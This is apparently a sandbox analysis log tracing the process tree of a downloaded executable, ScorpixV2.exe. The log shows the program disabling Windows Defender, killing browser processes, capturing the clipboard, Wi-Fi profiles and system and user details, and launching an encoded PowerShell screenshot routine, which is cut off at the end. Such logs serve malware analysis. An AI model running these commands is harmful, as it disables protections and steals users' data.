C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:22⤵PID:3468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:82⤵PID:4020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:3496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:12⤵PID:4664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:12⤵PID:4828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:82⤵PID:3272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:12⤵PID:5084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:12⤵PID:1752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:12⤵PID:3628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5452 /prefetch:82⤵PID:4000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:12⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6304 /prefetch:82⤵PID:1536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:12⤵PID:2552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:12⤵PID:2180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4144
-
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Executes dropped EXE
PID:3936 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3672
-
-
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Executes dropped EXE
PID:1900 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:4076 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'"4⤵PID:1636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:3832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"4⤵PID:1520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"4⤵PID:2744
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe5⤵
- Executes dropped EXE
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"7⤵PID:5140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"7⤵PID:4032
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name8⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"7⤵PID:5920
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer8⤵PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"7⤵PID:6068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"7⤵PID:5084
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:5220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"7⤵PID:4880
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer8⤵PID:5864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"7⤵PID:3672
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid8⤵PID:3460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"7⤵PID:4380
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:6008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"7⤵PID:5732
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:5988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"7⤵PID:5820
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39488⤵
- Kills process with taskkill
PID:5144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3028"7⤵PID:5320
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30288⤵
- Kills process with taskkill
PID:64
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3468"7⤵PID:5900
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34688⤵
- Kills process with taskkill
PID:5836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 800"7⤵PID:5372
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8008⤵
- Kills process with taskkill
PID:1176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4020"7⤵PID:5440
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40208⤵
- Kills process with taskkill
PID:5420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3496"7⤵PID:5568
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5492
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34968⤵
- Kills process with taskkill
PID:5632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"7⤵PID:3028
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17528⤵
- Kills process with taskkill
PID:5900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4000"7⤵PID:5924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:6080
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40008⤵
- Kills process with taskkill
PID:5644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2552"7⤵PID:1128
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5988
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 25528⤵
- Kills process with taskkill
PID:5336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2180"7⤵PID:3756
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21808⤵
- Kills process with taskkill
PID:5592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"7⤵PID:5620
-
C:\Windows\system32\cmd.execmd.exe /c chcp8⤵PID:536
-
C:\Windows\system32\chcp.comchcp9⤵PID:5272
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"7⤵PID:6072
-
C:\Windows\system32\cmd.execmd.exe /c chcp8⤵PID:5936
-
C:\Windows\system32\chcp.comchcp9⤵PID:5944
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"7⤵PID:5460
-
C:\Windows\system32\tasklist.exetasklist /FO LIST8⤵
- Enumerates processes with tasklist
PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"7⤵
- Clipboard Data
PID:5856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard8⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"7⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3064 -
C:\Windows\system32\netsh.exenetsh wlan show profiles8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"7⤵
- Network Service Discovery
PID:5364 -
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:5440
-
-
C:\Windows\system32\HOSTNAME.EXEhostname8⤵PID:2428
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername8⤵
- Collects information from the system
PID:5268
-
-
C:\Windows\system32\net.exenet user8⤵PID:6140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user9⤵PID:5664
-
-
-
C:\Windows\system32\query.exequery user8⤵PID:5784
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"9⤵PID:5680
-
-
-
C:\Windows\system32\net.exenet localgroup8⤵PID:5392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup9⤵PID:5244
-
-
-
C:\Windows\system32\net.exenet localgroup administrators8⤵PID:4584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators9⤵PID:5848
-
-
-
C:\Windows\system32\net.exenet user guest8⤵PID:5636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest9⤵PID:5384
-
-
-
C:\Windows\system32\net.exenet user administrator8⤵PID:1176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator9⤵PID:64
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command8⤵PID:3188
-
-
C:\Windows\system32\tasklist.exetasklist /svc8⤵
- Enumerates processes with tasklist
PID:3168
-
-
C:\Windows\system32\ipconfig.exeipconfig /all8⤵
- Gathers network information
PID:1752
-
-
C:\Windows\system32\ROUTE.EXEroute print8⤵PID:5460
-
-
C:\Windows\system32\ARP.EXEarp -a8⤵
- Network Service Discovery
PID:3456
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano8⤵
- System Network Connections Discovery
- Gathers network information
PID:4000
-
-
C:\Windows\system32\sc.exesc query type= service state= all8⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\system32\netsh.exenetsh firewall show state8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4760
-
-
C:\Windows\system32\netsh.exenetsh firewall show config8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"7⤵PID:2940
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid8⤵PID:3732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"7⤵PID:3844
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid8⤵PID:5492
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3108
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5260
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵PID:5492
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5508
-
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:5808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵PID:2772
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:5140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:4752
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:796
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵PID:5828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5384
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5444
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:6072
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:5508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:5792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5172
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:6140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5184
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1912 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:64
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:3832
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:5460
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAA